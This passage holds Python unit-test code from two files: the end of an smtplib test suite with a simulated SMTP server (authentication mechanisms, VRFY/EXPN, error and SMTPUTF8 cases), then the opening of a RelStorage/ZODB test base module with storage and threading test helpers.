self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
reltestbase.py
|
# -*- coding: utf-8; -*-
##############################################################################
#
# Copyright (c) 2008 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""A foundation for RelStorage tests"""
from __future__ import absolute_import
from __future__ import print_function
# pylint:disable=too-many-ancestors,abstract-method,too-many-public-methods,too-many-lines
# pylint:disable=too-many-statements,too-many-locals
import contextlib
import functools
import os
import random
import shutil
import tempfile
import time
import threading
import unittest
from textwrap import dedent
import transaction
from persistent import Persistent
from persistent.mapping import PersistentMapping
from zc.zlibstorage import ZlibStorage
import ZODB.tests.util
from ZODB.Connection import TransactionMetaData
from ZODB.DB import DB
from ZODB.FileStorage import FileStorage
from ZODB.POSException import ReadConflictError
from ZODB.POSException import ReadOnlyError
from ZODB.serialize import referencesf
from ZODB.utils import z64
from ZODB.utils import u64 as bytes8_to_int64
from ZODB.utils import p64 as int64_to_8bytes
from ZODB.tests import BasicStorage
from ZODB.tests import ConflictResolution
from ZODB.tests import MTStorage
from ZODB.tests import PackableStorage
from ZODB.tests import PersistentStorage
from ZODB.tests import ReadOnlyStorage
from ZODB.tests import StorageTestBase
from ZODB.tests import Synchronization
from ZODB.tests.StorageTestBase import zodb_pickle
from ZODB.tests.StorageTestBase import zodb_unpickle
from ZODB.tests.MinPO import MinPO
from . import fakecache
from . import util
from . import mock
from . import TestCase
from . import StorageCreatingMixin
from . import skipIfNoConcurrentWriters
from .persistentcache import PersistentCacheStorageTests
from .locking import TestLocking
from .test_zodbconvert import ZlibWrappedFSZODBConvertTests
class RelStorageTestBase(StorageCreatingMixin,
TestCase,
StorageTestBase.StorageTestBase):
base_dbname = None # Override
keep_history = None # Override
_storage_created = None
def _close(self):
# Override from StorageTestBase.
# Try to avoid creating one through our _storage property.
if '_storage' in self.__dict__:
storage = self._storage
else:
storage = self._storage_created
self._storage = None
if storage is not None:
storage.close()
storage.cleanup()
def make_storage_to_cache(self):
return self.make_storage()
def get_storage(self):
# Create a storage with default options
# if it has not been created already.
storage = self._storage_created
if storage is None:
storage = self.make_storage_to_cache()
self._storage_created = storage
return storage
def set_storage(self, storage):
self._storage_created = storage
_storage = property(
lambda self: self.get_storage(),
lambda self, nv: self.set_storage(nv)
)
def open(self, read_only=False, **kwargs):
# This is used by a few ZODB tests that close and reopen the storage.
storage = self._storage
if storage is not None:
self._storage = None
storage.close()
storage.cleanup()
self._storage = storage = self.make_storage(
read_only=read_only, zap=False, **kwargs)
return storage
class StorageClientThread(MTStorage.StorageClientThread):
# MTStorage assumes that the storage object is thread safe.
# This doesn't make any sense for an MVCC Storage like RelStorage;
# don't try to use a single instance in multiple threads.
#
# This patch makes it respect that.
def __init__(self, storage, *args, **kwargs):
storage = storage.new_instance()
super(StorageClientThread, self).__init__(storage, *args, **kwargs)
def runtest(self):
try:
super(StorageClientThread, self).runtest()
finally:
self.storage.release()
self.storage = None
class ExtStorageClientThread(StorageClientThread, MTStorage.ExtStorageClientThread):
"Same as above."
class ThreadWrapper(object):
def __init__(self, storage):
self.__storage = storage
# We can't use an RLock, which verifies that the thread that
# acquired is the one that releases; check_tid_ordering_w_commit
# deliberately spreads these actions across threads (for same reason).
self.__commit_lock = threading.Lock()
rl = self.__read_lock = threading.Lock()
self.__txn = None
def make_locked(name):
meth = getattr(storage, name)
@functools.wraps(meth)
def func(*args, **kwargs):
with rl:
return meth(*args, **kwargs)
return func
for name in (
'loadBefore',
'load',
'store',
'getTid',
'lastTransaction',
):
setattr(self, name, make_locked(name))
def __getattr__(self, name):
return getattr(self.__storage, name)
def tpc_begin(self, txn):
self.__commit_lock.acquire()
self.__read_lock.acquire()
assert not self.__txn
self.__txn = txn
self.__read_lock.release()
return self.__storage.tpc_begin(txn)
def tpc_finish(self, txn, callback=None):
self.__read_lock.acquire()
assert txn is self.__txn
try:
return self.__storage.tpc_finish(txn, callback)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
def tpc_abort(self, txn):
self.__read_lock.acquire()
assert txn is self.__txn, (txn, self.__txn)
try:
return self.__storage.tpc_abort(txn)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
class UsesThreadsOnASingleStorageMixin(object):
# These tests attempt to use threads on a single storage object.
# That doesn't make sense with MVCC, where every instance is its
# own connection and doesn't need to do any locking. This mixin makes
# those tests use a special storage that locks.
@contextlib.contextmanager
def __thread_safe_wrapper(self):
orig_storage = self._storage
wrapped = self._storage = ThreadWrapper(orig_storage)
try:
yield
finally:
if self._storage is wrapped:
self._storage = orig_storage
def __generic_wrapped_test(self, meth_name):
meth = getattr(
super(UsesThreadsOnASingleStorageMixin, self),
meth_name)
try:
with self.__thread_safe_wrapper():
meth()
finally:
self._storage.zap_all(slow=True)
def make_func(name): # pylint:disable=no-self-argument
return lambda self: self.__generic_wrapped_test(name)
for bad_test in (
'check_checkCurrentSerialInTransaction',
# This one stores a b'y' (invalid pickle) into the
# database as the root object, so if we don't get zapped
# afterwards, we can't open the database.
'check_tid_ordering_w_commit',
):
locals()[bad_test] = make_func(bad_test)
del make_func
del bad_test
class GenericRelStorageTests(
UsesThreadsOnASingleStorageMixin,
RelStorageTestBase,
PersistentCacheStorageTests,
TestLocking,
BasicStorage.BasicStorage,
PackableStorage.PackableStorage,
Synchronization.SynchronizedStorage,
ConflictResolution.ConflictResolvingStorage,
PersistentStorage.PersistentStorage,
MTStorage.MTStorage,
ReadOnlyStorage.ReadOnlyStorage,
):
def setUp(self):
# ZODB.tests.util.TestCase likes to change directories
# It tries to change back in tearDown(), but if there's an error,
# we may not get to tearDown. addCleanup() always runs, though.
# do that as the very last thing that happens (except for subclasses, they
# could add things first)
self.addCleanup(os.chdir, os.getcwd())
super(GenericRelStorageTests, self).setUp()
# PackableStorage is particularly bad about leaving things
# dangling. For example, if the ClientThread runs into
# problems, it doesn't close its connection, which can leave
# locks dangling until GC happens and break other threads and even
# other tests.
#
# Patch around that. Be sure to only close a given connection once,
# though.
_closing = self._closing
def db_factory(storage, *args, **kwargs):
db = _closing(DB(storage, *args, **kwargs))
db_open = db.open
def o(transaction_manager=None, at=None, before=None):
conn = db_open(transaction_manager=transaction_manager,
at=at,
before=before)
_closing(conn)
if transaction_manager is not None:
# If we're using an independent transaction, abort it *before*
# attempting to close the connection; that means it must be registered
# after the connection.
self.addCleanup(transaction_manager.abort)
return conn
db.open = o
return db
PackableStorage.DB = db_factory
self.addCleanup(setattr, MTStorage,
'StorageClientThread', MTStorage.StorageClientThread)
MTStorage.StorageClientThread = StorageClientThread
self.addCleanup(setattr, MTStorage,
'ExtStorageClientThread', MTStorage.ExtStorageClientThread)
MTStorage.ExtStorageClientThread = ExtStorageClientThread
def tearDown(self):
PackableStorage.DB = DB
super(GenericRelStorageTests, self).tearDown()
def _make_readonly(self):
# checkWriteMethods in ReadOnlyStorage assumes that
# the object has an undo() method, even though that's only
# required if it's IStorageUndoable, aka history-preserving.
super(GenericRelStorageTests, self)._make_readonly()
storage = self._storage
if not hasattr(storage, 'undo'):
def undo(*args, **kwargs):
raise ReadOnlyError
storage.undo = undo # pylint:disable=attribute-defined-outside-init
return storage
def checkCurrentObjectTidsRoot(self):
# Get the root object in place
db = self._closing(DB(self._storage))
conn = self._closing(db.open())
storage = conn._storage
cursor = storage._load_connection.cursor
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, [0])
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# Ask for many, many objects that don't exist.
# Force the implementation to loop if that's what it does internally.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(0, 3523))
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# No matching oids.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(1, 3523))
self.assertEqual(0, len(oid_to_tid))
conn.close()
db.close()
def checkLen(self):
# Override the version from BasicStorage because we
# actually do guarantee to keep track of the counts,
# within certain limits.
# len(storage) reports the number of objects.
# check it is zero when empty
self.assertEqual(len(self._storage), 0)
# check it is correct when the storage contains two object.
# len may also be zero, for storages that do not keep track
# of this number
self._dostore(data=PersistentMapping())
self._dostore(data=PersistentMapping())
self._storage._adapter.stats.large_database_change()
self.assertEqual(len(self._storage), 2)
def checkDropAndPrepare(self):
# Under PyPy, this test either takes a very long time (PyMySQL)
# or hangs (psycopg2cffi) longer than I want to wait (10+ minutes).
# This suggests there's a lock on a particular table (the eighth table we drop)
# which in turn suggests that there are connections still open and leaked!
# Running a manual GC seems to fix it. It's hard to reproduce manually because
# it seems to depend on a particular set of tests being run.
import gc
gc.collect()
gc.collect()
self._storage._adapter.schema.drop_all()
self._storage._adapter.schema.prepare()
def checkCrossConnectionInvalidation(self):
# Verify connections see updated state at txn boundaries
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['myobj'] = 'yes'
c2 = db.open()
r2 = c2.root()
self.assertNotIn('myobj', r2)
storage = c1._storage
t = transaction.Transaction()
t.description = u'invalidation test'
